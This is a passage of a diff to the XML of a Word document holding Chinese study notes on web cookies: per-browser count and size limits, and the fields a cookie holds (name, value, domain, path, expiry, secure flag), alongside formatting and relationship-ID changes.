           <w:szCs w:val="22"/>
         </w:rPr>
@@ -26007,6 +26003,7 @@
           <w:szCs w:val="32"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Cookie机制</w:t>
       </w:r>
     </w:p>
@@ -26019,23 +26016,22 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:color w:val="70AD47" w:themeColor="accent6"/>
+          <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="70AD47" w:themeColor="accent6"/>
+          <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Cookie</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="70AD47" w:themeColor="accent6"/>
+          <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
         </w:rPr>
         <w:t>的作用</w:t>
@@ -26050,6 +26046,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
@@ -26082,14 +26079,28 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:color w:val="70AD47" w:themeColor="accent6"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="70AD47" w:themeColor="accent6"/>
+          <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
         </w:rPr>
         <w:t>Cookie</w:t>
@@ -26097,7 +26108,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="70AD47" w:themeColor="accent6"/>
+          <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
         </w:rPr>
         <w:t>的分类</w:t>
@@ -26307,7 +26318,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
           <w:sz w:val="44"/>
           <w:szCs w:val="44"/>
         </w:rPr>
@@ -26331,6 +26342,699 @@
           <w:numId w:val="46"/>
         </w:numPr>
         <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="44"/>
+          <w:szCs w:val="44"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Cookie的限制</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Cookie的性质上是绑定到当前域名下的。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>当设定了当前Cookie后，再给创建它的域名发送请求时都会包含这个cookie。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>每个域的Cookie是有数量限制的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>，不同的浏览器之间各不相同：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>IE6及之前的版本限制每个域最多20个cookie</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>IE7及之后的版本限制50个cookie</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Firefox限制每个域最多50个cookie</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Opera限制每个域最多30个cookie</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Safari和Chrome对cookie的数量没有限制</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>浏览器对域的大小也有限制</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>，大多数浏览器都有大约</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>4kb的长度限制</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Cookie的构成</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ookie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>由浏览器保存由以下信息组成</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>名称</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>：cookie的名称，具有唯一性，不区分大小写，cookie名称必须经过URL编码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>值</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>存储在cookie中的字符串值，必须经过URL编码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>域</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>cookie只对指定域有效。所有向该域发送的请求都会包含该cookie信息。这个值可以包含子域(如：</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId31" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="28"/>
+          </w:rPr>
+          <w:t>www.baidu.com</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)，也可以不包含子域(如:baidu.com</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>，这样就对baidu.com所有子域都有效，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>这是</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>实现单点登陆的关键</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>路径</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>对于指定域中的那个路径，应该向服务器发送cookie。例如：你可以指定向</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId32" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="28"/>
+          </w:rPr>
+          <w:t>www.baidu.com/pay</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>发送cookie，而</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId33" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="28"/>
+          </w:rPr>
+          <w:t>www.baidu.com不会发送cookie</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>失效时间</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>表示cookie何时应该被删除的时间戳，这个值是GMT 格式的日期</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>安全标志</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>指定后，cookie只有在使用SSL连接时才会发送到服务器。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
         <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
@@ -26374,7 +27078,7 @@
           <w:szCs w:val="44"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId31" w:history="1">
+      <w:hyperlink r:id="rId34" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -26572,6 +27276,7 @@
           <w:szCs w:val="22"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>之前，这些都是由 cookie 完成的。但是 cookie 不适合大量数据的存储，因为它们由每个对服务器的请求来传递，这使得 cookie 速度很慢而且效率也不高。</w:t>
       </w:r>
     </w:p>
@@ -26695,7 +27400,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId32" w:history="1">
+      <w:hyperlink r:id="rId35" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -26802,7 +27507,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId33" cstate="print"/>
+                    <a:blip r:embed="rId36" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -26844,7 +27549,6 @@
           <w:sz w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>在这张图中，Web服务器中运行的Web应用程序就是我们所说的Application，每个客户端与Web服务器之间建立的连接就可以看做是一个Session。比如现在服务器端运行的是一个论坛系统，那么现在这个正运行在服务器端的论坛系统的软件就可以看做Application，而每个在线的用户与之建立的连接就相当于一个Session。</w:t>
       </w:r>
     </w:p>
@@ -26922,7 +27626,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId34" w:history="1">
